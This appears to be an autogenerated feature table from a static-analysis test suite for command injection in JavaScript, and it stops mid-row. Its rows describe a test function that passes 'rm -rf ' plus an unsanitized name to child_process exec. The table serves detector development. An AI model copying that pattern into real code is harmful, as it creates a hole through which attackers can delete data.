autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:16:405:25 | sanitizer3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:16:405:25 | sanitizer3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:16:405:25 | sanitizer3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | cp | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | cp | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | this | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | this | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | yetAnohterSanitizer | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | yetAnohterSanitizer | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:405:28 | yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | 'arguments' object of anonymous function | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | exceptional return of anonymous function | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | functio ... // OK\\n} | assignedToPropName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | return of anonymous function | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:29:410:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:39:405:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:3 | cp | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:3 | cp | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:8 | cp.exec | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:5:406:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:5:406:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:5:406:8 | exec | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:5:406:8 | exec | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:5:406:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:18 | "rm -rf " | contextFunctionInterfaces | 